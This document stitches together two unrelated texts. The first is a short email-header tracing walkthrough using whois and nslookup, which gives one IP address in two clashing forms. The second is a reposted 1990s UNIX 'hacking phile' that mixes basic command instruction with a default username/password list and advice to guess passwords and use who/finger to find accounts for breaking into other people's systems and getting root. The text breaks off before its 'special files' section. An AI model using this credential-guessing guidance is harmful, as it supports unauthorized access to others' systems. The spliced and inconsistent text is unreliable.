Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

A Hacking Tutorial

noreply@blogger.com (Agung Prasetiawan,) — Fri, 23 Dec 2016 07:16:00 +0000

----------------------
o Intent of this file:
----------------------

     This phile is geared as an UNIX tutorial at first, to let you get more
familiar with the operating system. UNIX is just an operating system, as
is MS-DOS, AppleDOS, AmigaDOS, and others. UNIX happens to be a multi-user-
multi-tasking system, thus bringing a need for security not found on MSDOS,
AppleDOS, etc. This phile will hopefully teach the beginners who do not have
a clue about how to use UNIX a good start, and may hopefully teach old pros
something they didn't know before. This file deals with UNIX SYSTEM V and
its variants. When I talk about unix, its usually about SYSTEM V (rel 3.2).

Where Can I be found? I have no Idea. The Boards today are going Up'n'Down
so fast, 3 days after you read this file, if I put a BBS in it where you could
reach me, it may be down! Just look for me.

I can be reached on DarkWood Castle [If it goes back up], but that board
is hard to get access on, but I decided to mention it anyway.

I *COULD* Have been reached on jolnet, but......

This file may have some bad spelling, etc, or discrepencies since it was
spread out over a long time of writing, because of school, work, Girl friend,
etc. Please, no flames. If you don't like this file, don't keep it.

This is distributed under PHAZE Inc. Here are the members (and ex ones)
The Dark Pawn
The Data Wizard
Sir Hackalot (Me)
Taxi (ummm.. Busted)
Lancia (Busted)
The British Knight (Busted)
The Living Pharoah (Busted)

_____________________________________________________________________________

-------------
o Dedication:
-------------
        This phile is dedicated to the members of LOD that were raided in
Atlanta. The members that got busted were very good hackers, especially
The Prophet. Good luck to you guys, and I hope you show up again somewhere.
_____________________________________________________________________________

------------------------
o A little History, etc:
------------------------

        UNIX, of course, was invented By AT&T in the 60's somewhere, to be
"a programmer's operating system." While that goal was probably not reached
when they first invented UNIX, it seems that now, UNIX is a programmer's OS.
UNIX, as I have said before, is a multi-tasking/multi-user OS. It is also
written in C, or at least large parts of it are, thus making it a portable
operating system. We know that MSDOS corresponds to IBM/clone machines,
right? Well, this is not the case with UNIX. We do not associate it with
any one computer since it has been adapted for many, and there are many
UNIX variants [that is, UNIX modified by a vendor, or such]. Some AT&T
computers run it, and also some run MSDOS [AT&T 6300]. The SUN workstations
run SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX version
of UNIX. Remember, no matter what the name of the operating system is [BSD,
UNIX,SunOS,Ultrix,Xenix, etc.], they still have a lot in common, such as the
commands the operating system uses. Some variants may have features others
do not, but they are basically similar in that they have a lot of the same
commands/datafiles. When someone tries to tell you that UNIX goes along with
a certain type of computer, they may be right, but remember, some computers
have more than one Operating system. For instance, one person may tell you
that UNIX is to a VAX as MSDOS is to IBM/clones. That is untrue, and the
only reason I stated that, was because I have seen many messages with info
/comparisons in it like that, which confuse users when they see a VAX running
VMS.
____________________________________________________________________________

-------------------------------
o Identifying a Unix/Logging in
-------------------------------

        From now on, I will be referring to all the UNIX variants/etc as
UNIX, so when I say something about UNIX, it generally means all the variants
(Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless
I state a variant in particular.

        Okay. Now its time for me to tell you how a unix USUALLY greets you.
First, when you call up a UNIX, or connect to one however you do, you will
usually get this prompt:

login:

Ok. Thats all fine and dandy. That means that this is PROBABLY a Unix,
although there are BBS's that can mimic the login procedure of an OS
(Operating System), thus making some people believe its a Unix. [Hah!].
Some Unixes will tell you what they are or give you a message before a
login: prompt, as such:

Welcome to SHUnix. Please log in.

login:

        Or something like that. Public access Unixes [like Public BBSs] will
tell you how to logon if you are a new users. Unfortunatly, this phile is
not about public access Unixes, but I will talk about them briefly later, as
a UUCP/UseNet/Bitnet address for mail.
        OK. You've gotten to the login prompt! Now, what you need to do
here is enter in a valid account. An Account usually consists of 8 characters
or less. After you enter in an account, you will probably get a password
prompt of some sort. The prompts may vary, as the source code to the login
program is usually supplied with UNIX, or is readily available for free.
Well, The easiest thing I can say to do to login is basically this:
Get an account, or try the defaults. The defaults are ones that came with
the operating system, in standard form. The list of some of the Defaults
are as follows:

ACCOUNT                         PASSWORD
-------                         --------
root                            root      - Rarely open to hackers
sys                             sys / system / bin
bin                             sys / bin
mountfsys                       mountfsys
adm                             adm
uucp                            uucp
nuucp                           anon
anon                            anon
user                            user
games                           games
install                         install
reboot                            * See Below
demo                            demo
umountfsys                      umountfsys
sync                            sync
admin                           admin
guest                           guest
daemon                          daemon

The accounts root, mountfsys, umountfsys, install, and sometimes sync are
root level accounts, meaning they have sysop power, or total power. Other
logins are just "user level" logins meaning they only have power over what
files/processes they own. I'll get into that later, in the file permissions
section. The REBOOT login is what as known as a command login, which just
simply doesn't let you into the operating system, but executes a program
assigned to it. It usually does just what it says, reboot the system. It
may not be standard on all UNIX systems, but I have seen it on UNISYS unixes
and also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts have
not been passworded [reboot], which is real stupid, if you ask me.

COMMAND LOGINS:
---------------

There are "command logins", which, like reboot, execute a command then log
you off instead of letting you use the command interpreter. BSD is notorious
for having these, and concequently, so does MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same

These are the most useful, since they will give the account names that are
online, thus showing you several accounts that actually exist.

Errors:
-------

When you get an invalid Account name / invalid password, or both, you will
get some kind of error. Usually it is the "login incorrect" message. When
the computer tells you that, you have done something wrong by either enterring
an invalid account name, or a valid account name, but invalid password. It
does not tell you which mistake you made, for obvious reasons. Also,
when you login incorrectly, the error log on the system gets updated, letting
the sysops(s) know something is amiss.

        Another error is "Cannot change to home directory" or "Cannot Change
Directory." This means that no "home directory" which is essentially the
'root' directory for an account, which is the directory you start off in.
On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in
/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].
Most systems will log you off after this, but some tell you that they will
put you in the root directory [ '/'].

        Another error is "No Shell". This means that no "shell" was defined
for that particular account. The "shell" will be explained later. Some
systems will log you off after this message. Others will tell you that they
will use the regular shell, by saying "Using the bourne shell", or "Using sh"

-----------------------------
Accounts In General        :
-----------------------------

        This section is to hopefully describe to you the user structure
in the UNIX environment.
        Ok, think of UNIX having two levels of security: absolute power,
or just a regular user. The ones that have absolute power are those users
at the root level. Ok, now is the time to think in numbers. Unix associates
numbers with account names. each account will have a number. Some will have
the same number. That number is the UID [user-id] of the account. the root
user id is 0. Any account that has a user id of 0 will have root access.
Unix does not deal with account names (logins) but rather the number
associated with them. for instance, If my user-id is 50, and someone else's
is 50, with both have absolute power of each other, but no-one else.
_____________________________________________________________________________

---------------
Shells        :
---------------

        A shell is an executable program which loads and runs when a user
logs on, and is in the foreground. This "shell" can be any executable prog-
ram, and it is defined in the "passwd" file which is the userfile. Each
login can have a unique "shell". Ok. Now the shell that we usually will work
with is a command interpreter. A command interpreter is simply something
like MSDOS's COMMAND.COM, which processes commands, and sends them to the
kernel [operating system]. A shell can be anything, as I said before,
but the one you want to have is a command interpreter. Here are the
usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has
     a "script" language, as do most of the command interpreters on Unix sys-
     tems.

csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell. Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell. Both Explained later.
        There are many others, including "homemade " shells, which are
programs written by the owner of a unix, or for a specific unix, and they
are not standard. Remember, the shell is just the program you get to use
and when it is done executing, you get logged off. A good example of a
homemade shell is on Eskimo North, a public access Unix. The shell
is called "Esh", and it is just something like a one-key-press BBS,
but hey, its still a shell. The Number to eskimo north is 206-387-3637.
[206-For-Ever]. If you call there, send Glitch Lots of mail.
        Several companies use Word Processors, databases, and other things
as a user shell, to prevent abuse, and make life easier for unskilled computer
operators. Several Medical Hospitals use this kind of shell in Georgia,
and fortunatly, these second rate programs leave major holes in Unix.
Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, they
give you a choice between a command interpreter, or a BBS as a shell.
WHen you have a command interpreter, the prompt is usually a:
$
when you are a root user the prompt is usually a:
#
The variable, PS1, can be set to hold a prompt.
For instance, if PS1 is "HI:", your prompt will be:
HI:

_____________________________________________________________________________

------------------------
SPecial Characters, ETc:
------------------------

Control-D : End of file. When using mail or a text editor, this will end
the message or text file. If you are in the shell and hit control-d you get
logged off.

Control-J: On some systems, this is like the enter key.
@ : Is sometimes a "null"
? : This is a wildcard. This can represent a letter. If you specified
   something at the command line like "b?b" Unix would look for bob,bib,bub,
   and every other letter/number between a-z, 0-9.
* : this can represent any number of characters. If you specified a "hi*"
    it would use "hit", him, hiiii, hiya, and ANYTHING that starts with
    hi. "H*l" could by hill, hull, hl, and anything that starts with an
    H and ends with an L.

[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob
     if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The
     [], ?, and * are usually used with copy, deleting files, and directory
     listings.

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not
the same thing. This allows for many files to be able to be stored, since
"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using
the [] stuff, you have to specify capital letters if any files you are dealing
with has capital letters. Most everything is lower case though.

----------------
Commands to use:
----------------

Now, I will rundown some of the useful commands of Unix. I will act
as if I were typing in the actual command from a prompt.

ls - this is to get a directory. With no arguments, it will just print out
     file names in either one column or multi-column output, depending on the
     ls program you have access to.

        example:
        $ ls
        hithere
        runme
        note.text
        src
        $
        the -l switch will give you extended info on the files.
        $ ls -l
        rwx--x--x sirhack     sirh    10990 runme
        and so on....

the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack    sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.
The format varies, but you should have the general idea.

cat - this types out a file onto the screen. should be used on text files.
      only use it with binary files to make a user mad [explained later]
      ex:
      $ cat note.txt
      This is a sample text file!
      $

cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn.
     the dir1/etc.... describes the directory name. Say I want to get
     to the root directory.
     ex:
     $ cd /
     *ok, I'm there.*
     $ ls
     bin
     sys
     etc
     temp
     work
     usr
all of the above are directories, lets say.
     $ cd /usr
     $ ls
     sirhack
     datawiz
     prophet
     src
     violence
     par
     phiber
     scythian
     $ cd /usr/sirhack
     $ ls
     hithere
     runme
     note.text
     src
     $
ok, now, you do not have to enter the full dir name. if you are in
a directory, and want to get into one that is right there [say "src"], you
can type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from the
sirhack dir, you can type "cd src"

cp - this copies a file. syntax for it is "cp fromfile tofile"
     $ cp runme runme2
     $ ls
     hithere
     runme
     note.text
     src
     runme2
Full pathnames can be included, as to copy it to another directory.
     $ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
     $ mv runme2 runit
     $ ls
     hithere
     runme
     note.text
     src
     runit
    files can be renamed into other directories.
     $ mv runit /usr/datwiz/run
     $ ls
     hithere
     runme
     note.text
     src
     $ ls /usr/datwiz
     runme
     run

pwd - gives current directory
     $ pwd
     /usr/sirhack
     $ cd src
     $ pwd
     /usr/sirhack/src
     $ cd ..
     $ pwd
     /usr/sirhack
     [ the ".." means use the name one directory back. ]
     $ cd ../datwiz
       [translates to cd /usr/datwiz]
     $ pwd
     /usr/datwiz
     $ cd $home
     [goto home dir]
     $ pwd
     /usr/sirhack

rm - delete a file. syntax "rm filename" or "rm -r directory name"
     $ rm note.text
     $ ls
     hithere
     runme
     src
     $

write - chat with another user. Well, "write" to another user.
syntax: "write username"
    $ write scythian
    scythian has been notified
    Hey Scy! What up??
    Message from scythian on tty001 at 17:32
    hey!
    me: So, hows life?
    scy: ok, I guess.
    me: gotta go finish this text file.
    scy: ok
    me: control-D [to exit program]
    $

who [w,who,whodo] - print who is online
    $ who
    login       term   logontime
    scythian + tty001 17:20
    phiberO + tty002 15:50
    sirhack + tty003 17:21
    datawiz - tty004 11:20
    glitch   - tty666 66:60
    $
    the "who" commands may vary in the information given. a "+" means
    you can "write" to their terminal, a "-" means you cannot.

man - show a manual page entry. syntax "man command name" This is a help
      program. If you wanted to know how to use... "who" you'd type
    $ man who
    WHO(1)   xxx......
      and it would tell you.

stty - set your terminal characteristics. You WILL have to do "man stty"
     since each stty is different, it seems like.
     an example would be:
    $ stty -parenb
      to make the data params N,8,1. A lot of Unixes operate at
      e,7,1 by default.

sz,rz - send and recieve via zmodem
rx,sx - send / recieve via xmodem
rb,sb - send via batch ymodem.   These 6 programs may or may not be on a unix.
umodem - send/recieve via umodem.
      $ sz filename
      ready to send...
      $ rz filename
      please send your file....
      ...etc..

ed - text editor. Usage "ed filename" to create a file that doesn't
     exist, just enter in "ed filename"
     some versions of ed will give you a prompt, such as "*" others will not
     $ ed newtext
     0
     * a
     This is line 1
     This is line 2
     [control-z]
     * 1 [to see line one]
     This is line 1
     * a [keep adding]
     This is line 3
     [control-z]
     *0a [add after line 0]
     This is THE first line
     [control-z]
     1,4l
     This is THE first line
     This is line 1
     This is line 2
     This is line 3
     * w
     71
     * q
     $
   The 71 is number of bytes written.
   a = append
   l = list
   # = print line number
   w - write
   l fname = load fname
   s fname = save to fname
   w = write to current file
   q = quit
mesg - turn write permissions on or off to your terminal (allow chat)
     format "mesg y" or "mesg n"
cc - the C compiler. don't worry about this one right now.
chmod - change mode of a file. Change the access in other words.
        syntax: "chmod mode filename"
        $ chmod a+r newtext
      Now everyone can read newtext.
      a = all
      r = read. This will be explained further in the File System section.

chown - change the owner of a file.
       syntax: "chown owner filename"
       $ chown scythian newtext
       $
chgrp - change the group [explained later] of a file.
       syntax: "chgrp group file"
       $ chgrp root runme
       $
finger - print out basic info on an account. Format: finger username
grep - search for patterns in a file. syntax: "grep pattern file"
       $ grep 1 newtext
       This is Line 1
       $ grep THE newtext
       This is THE first line
       $ grep "THE line 1" newtext
       $

mail - This is a very useful utility. Obviously, you already know what it
        is by its name. There are several MAIL utilities, such as ELM, MUSH
        and MSH, but the basic "mail" program is called "mail". The usage
        is:
        "mail username@address" or
        "mail username"
        or
        "mail"
        or "mail addr1!addr2!addr3!user"

        "mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can recieve Unix Mail. When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps. The smart mailer will find the "adress" part
of the command and expand it into the full pathname usually. I could look
like this: mail phiber@optik
           then look like this to the computer:

           mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Do not worry about it, I was merely explaining the principal of the thing.
Now, if there is no smart mailer online, you'll have to know the FULL path
name of the person you wish to mail to. For Instance, I want to mail to
.. phiber. I'd do this if there were no smart mailer:

$ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

    Hey Guy. Whats up? Well, gotta go. Nice long message huh?
    [control-D]
$
Then, when he got it, there would be about 20 lines of information, with
like a post mark from every system my message went thru, and the "from" line
would look like so:

From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack <Sir Hack>

        Now, for local mailing, just type in "mail username" where username
is the login you want to send mail to. Then type in your message. Then
end it with a control-D.

        To read YOUR mail, just type in mail. IE:

        $ mail

        From scythian ............
        To sirhack ............
        Subject: Well....

        Arghhh!

        ?
The dots represent omitted crap. Each Mail program makes its own headings.
That ? is a prompt. At this prompt I can type:

        d - delete
        f username - forward to username
        w fname - write message to a file named fname
        s fname - save message with header into file
        q - quit / update mail
        x - quit, but don't change a thing
        m username - mail to username
        r - reply
        [enter] - read next message
        + - go forward one message
        - : go back one
        h - print out message headers that are in your mailbox.

There are others, to see them, you'd usually hit '?'.

--------

If you send mail to someone not on your system, you will have to wait longer
for a reply, since it is just as a letter. A "postman" has to pick it up.
The system might call out, and use UUCP to transfer mail. Usually, uucp
accounts are no good to one, unless you have uucp available to intercept mail.

ps - process. This command allows you to see what you are actually doing
in memory. Everytime you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root. usually, the first thing in a process
list given by "ps" is your shell name. Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian". The watch program would
go into the background, meaning I'd still be able to do things while it was
running:
$ ps
PID TTY NAME
122 001 ksh
123 001 watch
$
That is a shortened PS. That is the default listing [a brief one].
The TTY column represents the "tty" [i/o device] that the process is being
run from. This is only useful really if you are using layers (don't worry)
or more than one person is logged in with the same account name. Now,
"ps -f" would give a full process listing on yourself, so instead of
seeing just plain ole "watch" you'd most likely see "watch scythian"

kill - kill a process. This is used to terminate a program in memory obvio-
ously. You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill.
(Will explain euid later). If you kill the shell process, you are logged
off. By the same token, if you kill someone else's shell process, they
are logged off. So, if I said "kill 122" I would be logged off. However,
kill only sends a signal to UNIX telling it to kill off a process. If
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels
like it, which may be never. So, you can specify urgency! Try "kill -num pid"
Kill -9 pid is a definite kill almost instantly. So if I did this:
$ kill 122
$ kill 123
$ ps
PID   TTY   NAME
122   001   ksh
123   001   watch
$ kill -9 123
[123]: killed
$ kill -9 122
garbage
NO CARRIER

Also, you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (explained later).

-------------------
Shell Programmin'
-------------------

        Shell Programming is basically making a "script" file for the
standard shell, being sh, ksh, csh, or something on those lines. Its
like an MSDOS batch file, but more complex, and more Flexible.
This can be useful in one aspect of hacking.

First, lets get into variables. Variables obviously can be assigned
values. These values can be string values, or numberic values.

number=1

        That would assign 1 to the variable named "number".

string=Hi There
or
string="Hi There"

        Both would assign "Hi there" to a variable.

        Using a variable is different though. When you wish to use a variable
        you must procede it with a dollar ($) sign. These variables can
        be used as arguments in programs. When I said that scripts are
        like batch files, I meant it. You can enter in any name of a program
        in a script file, and it will execute it. Here is a sample script.

counter=1
arg1="-uf"
arg2="scythian"

ps $arg1 $arg2

echo $counter

        That script would translate to "ps -uf scythian" then would print
        "1" after that was finished. ECHO prints something on the screen
        whether it be numeric, or a string constant.

Other Commands / Examples:

read - reads someting into a variable. format : read variable . No dollar
        sign is needed here! If I wwanted to get someone's name, I could
        put:

echo "What is your name?"
read hisname
echo Hello $hisname

        What is your name?
        Sir Hackalot
        Hello Sir Hackalot

        Remember, read can read numeric values also.

trap - This can watch for someone to use the interrupt character. (Ctrl-c)
       format: trap "command ; command ; command ; etc.."
Example:
        trap "echo 'Noway!! You are not getting rid o me that easy' ; echo
        'You gotta see this through!'"

        Now, if I hit control-c during the script after this statement was
        executed, I'd get:
        Noway!! You are not getting rid of me that easy
        You gotta see this through!

exit : format :exit [num] This exists the shell [quits] with return
        code of num.

-----
CASE
-----

        Case execution is like a menu choice deal. The format of the command
        or structure is :
        case variable in
        1) command;
           command;;
        2) command;
           command;
           command;;
        *) command;;
         esac
        Each part can have any number of commands. The last command however
        must have a ";;". Take this menu:

        echo "Please Choose:"
        echo "(D)irectory (L)ogoff (S)hell"
        read choice
        case $choice in

        D) echo "Doing Directory...";
           ls -al ;;
        L) echo Bye;
           kill -1 0;;
        S) exit;;
        *) Echo "Error! Not a command";;
        esac

        The esac marks the end of a case function. It must be after the
        LAST command.

Loops
-----

        Ok, loops. There are two loop functins. the for loops, and the
        repeat.

        repeat looks like this: repeat something somethin1 somethin2
        this would repeat a section of your script for each "something".
        say i did this:
        repeat scythian sirhack prophet

        I may see "scythian" then sirhack then prophet on my screen.

        The for loop is defined as "for variable in something
                                    do
                                    ..
                                    ..
                                    done"

        an example:
        for counter in 1 2 3
        do
        echo $counter
        done

        That would print out 1 then 2 then 3.

Using TEST
----------
The format: Test variable option variable

The optios are:
-eq    =
-ne    <> (not equal)
-gt    >
-lt    <
-ge    >=
-le    <=

for strings its: = for equal != for not equal.

If the condition is true, a zero is returned. Watch:

        test 3 -eq 3

that would be test 3 = 3, and 0 would be returned.

EXPR
----

This is for numeric functions. You cannot simply type in
echo 4 + 5
and get an answer most of the time. you must say:
expr variable [or number] operator variable2 [or number]
the operators are:

+ add
- subtract
* multiply
/ divide
^ - power (on some systems)

example :   expr 4 + 5
var = expr 4 + 5
var would hold 9.

        On some systems, expr sometimes prints out a formula. I mean,
        22+12 is not the same as 22 + 12. If you said expr 22+12 you
        would see:
        22+12
        If you did expr 22 + 12 you'd see:
        34

SYSTEM VARIABLES
----------------

        These are variables used by the shell, and are usually set in the
system wide .profile [explained later].

HOME - location of your home directory.
PS1 - The prompt you are given. usually $ . On BSD its usually &
PATH - This is the search path for programs. When you type in a program
to be run, it is not in memory; it must be loaded off disk. Most commands
are not in Memory like MSDOS. If a program is on the search path, it may
be executed no matter where you are. If not, you must be in the directory
where the program is. A path is a set of directories basically, seperated by
":"'s. Here is a typical search path:

        :/bin:/etc:/usr/lbin:$HOME:

When you tried to execute a program, Unix would look for it in /bin,
/etc, /usr/lbin, and your home directory, and if its not found, an error is
spewed out. It searches directories in ORDER of the path. SO if you had a
program named "sh" in your home directory, and typed in "sh", EVEN if
you were in your home dir, it would execute the one in /bin. So, you
must set your paths wisely. Public access Unixes do this for you, but systems
you may encounter may have no path set.

TERM - This is your terminal type. UNIX has a library of functions called
"CURSES" which can take advantage of any terminal, provided the escape
codes are found. You must have your term set to something if you run
screen oriented programs. The escape codes/names of terms are found
in a file called TERMCAP. Don't worry about that. just set your term
to ansi or vt100. CURSES will let you know if it cannot manipulate your
terminal emulation.

-------------------
The C compiler
-------------------

        This Will be BRIEF. Why? Becuase if you want to learn C, go
        buy a book. I don't have time to write another text file on
        C, for it would be huge. Basically, most executables are programmed
        in C. Source code files on unix are found as filename.c .
        To compile one, type in "cc filename.c". Not all C programs
        will compile, since they may depend on other files not there, or
        are just modules. If you see a think called "makefile" you can
        usually type in just "make" at the command prompt, and something
        will be compiled, or be attempted to compile. When using make or
        CC, it would be wise to use the background operand since
        compiling sometimes takes for ever.
        IE:
        $ cc login.c&
        [1234]
        $
        (The 1234 was the process # it got identified as).

_____________________________________________________________________________

---------------
The FILE SYSTEM
---------------

        This is an instrumental part of UNIX. If you do not understand this
section, you'll never get the hang of hacking Unix, since a lot of Pranks
you can play, and things you can do to "raise your access" depend on it.

First, Let's start out by talking about the directory structure. It is
basically a Hiearchy file system, meaning, it starts out at a root directory
and expands, just as MSDOS, and possibly AmigaDos.

Here is a Directory Tree of sorts: (d) means directory

                        / (root dir)
                        |
                        |--------------------|
                      bin (d)               usr (d)
                                        ----^--------------------
                                        |        |              |
                                    sirhack(d) scythian (d)    prophet (d)
                                        |
                                        src (d)

Now, this particular system contains the following directories:
/
/bin
/usr
/usr/sirhack
/usr/sirhack/src
/usr/scythian
/usr/prophet

Hopefully, you understood that part, and you should. Everything spawns from
the root directory.

o File Permissions!
------------------

Now, this is really the biggie. File Permissions. It is not that hard to
understand file permissions, but I will explain them deeply anyway.

OK, now you must think of user groups as well as user names. Everyone
belongs to a group. at the $ prompt, you could type in 'id' to see what
group you are in. Ok, groups are used to allow people access certain things,
instead of just having one person controlling/having access to certain files.
Remember also, that Unix looks at someone's UID to determine access, not
user name.

Ok. File permissions are not really that complicated. Each file has an owner
This OWNER is usually the one who creates the file, either by copying a file
or just by plain editing one. The program CHOWN can be used to give someone
ownership of a file. Remember that the owner of a file must be the one who
runs CHOWN, since he is the only one that can change the permissions of a file
Also, there is a group owner, which is basically the group that you were in
when the file was created. You would use chgrp to change the group a file is
in.

Now, Files can have Execute permissions, read permissions, or write permission.
If you have execute permission, you know that you can just type in the name
of that program at the command line, and it will execute. If you have read
permission on a file, you can obviously read the file, or do anything that
reads the file in, such as copying the file or cat[ing] it (Typing it).
If you do NOT have access to read a file, you can't do anything that requires
reading in the file. This is the same respect with write permission. Now,
all the permissions are arranged into 3 groups. The first is the owner's
permissions. He may have the permissions set for himself to read and execute
the file, but not write to it. This would keep him from deleting it.
The second group is the group permissions. Take an elongated directory
for an example:
$ ls -l runme
r-xrwxr-- sirhack       root     10990 March 21 runme

ok. Now, "root" is the groupname this file is in. "sirhack" is the owner.
Now, if the group named 'root' has access to read, write and execute, they
could do just that. Say .. Scythian came across the file, and was in the root
user group. He could read write or execute the file. Now, say datawiz came
across it, but was in the "users" group. The group permissions would not
apply to him, meaning he would have no permissions, so he couldn't touch
the file, right? Sorta. There is a third group of permissions, and this is
the "other" group. This means that the permissions in the "other" group
apply to everyone but the owner, and the users in the same group as the file.
Look at the directory entry above. the r-x-rwxr-- is the permissions line.
The first three characters are the permissions for the owner (r-x). The
"r-x" translates to "Read and execute permissions, but no write permissions"
the second set of three, r-xRWXr-- (the ones in capital letters) are the group
permissions. Those three characters mean "Read, write, and execution allowed"
The 3rd set, r-xrwxR-- is the permissions for everyone else. It means
"Reading allowed, but nothing else". A directory would look something like
this:
$ ls -l
drwxr-xr-x sirhack     root 342 March 11 src

A directory has a "d" at the beggining of the permissions line. Now, the
owner of the directory (sirhack) can read from the directory, write in the
directory, and execute programs from the directory. The root group and every-
one else can only read from the directory, and execute off the directory.
So, If I changed the directory to be executable only, this is
what it would look like:
$ chmod go-r
$ ls
drwx--x--x sirhack   root 342 March 11 src

Now, if someone went into the directory besides "sirhack", they could only
execute programs in the directory. If they did an "ls" to get a directory
of src, when they were inside src, it would say "cannot read directory".
If there is a file that is readable in the directory, but the directory is
not readable, it is sometimes possible to read the file anyway.

If you do not have execute permissions in a directory, you won't be able to
execute anything in the directory, most of the time.

_____________________________________________________________________________

--------------
Hacking:
--------------
        The first step in hacking a UNIX is to get into the operating system
by finding a valid account/password. The object of hacking is usually to
get root (full privileges), so if you're lucky enough to get in as root,
you need not read anymore of this hacking phile , and get into the
"Having Fun" Section. Hacking can also be just to get other's accounts also.

Getting IN
----------
        The first thing to do is to GET IN to the Unix. I mean, get past
the login prompt. That is the very first thing. When you come across a UNIX,
sometimes it will identify itself by saying something like,
"Young INC. Company UNIX"

or Just
"Young Inc. Please login"

        Here is where you try the defaults I listed. If you get in with those
you can get into the more advanced hacking (getting root). If you do something
wrong at login, you'll get the message
"login incorrect"
This was meant to confuse hackers, or keep the wondering. Why?
Well, you don't know if you've enterred an account that does not exist, or one
that does exist, and got the wrong password. If you login as root and it says
"Not on Console", you have a problem. You have to login as someone else,
and use SU to become root.

   Now, this is where you have to think. If you cannot get in with a
default, you are obviously going to have to find something else to
login as. Some systems provide a good way to do this by allowing the use
of command logins. These are ones which simply execute a command, then
logoff. However, the commands they execute are usually useful. For instance
there are three common command logins that tell you who is online at the
present time. They are:
        who
        rwho
        finger

    If you ever successfully get one of these to work, you can write down
the usernames of those online, and try to logon as them. Lots of unsuspecting
users use there login name as their password. For instance, the user
"bob" may have a password named "bob" or "bob1".   This, as you know, is
not smart, but they don't expect a hacking spree to be carried out on
them. They merely want to be able to login fast.
   If a command login does not exist, or is not useful at all, you will
have to brainstorm. A good thing to try is to use the name of the unix
that it is identified as. For instance, Young INC's Unix may have an account
named "young"
        Young, INC. Please Login.
        login: young
        UNIX SYSTEM V REL 3.2
        (c)1984 AT&T..
        ..
        ..
        ..

   Some unixes have an account open named "test". This is also a default,
but surprisingly enough, it is sometimes left open. It is good to try to
use it. Remember, brainstorming is the key to a unix that has no apparent
defaults open. Think of things that may go along with the Unix. type
in stuff like "info", "password", "dial", "bbs" and other things that
may pertain to the system. "att" is present on some machines also.

ONCE INSIDE -- SPECIAL FILES
----------------------------
        There are several files that are very important to the UNIX
environment. They are as follows:

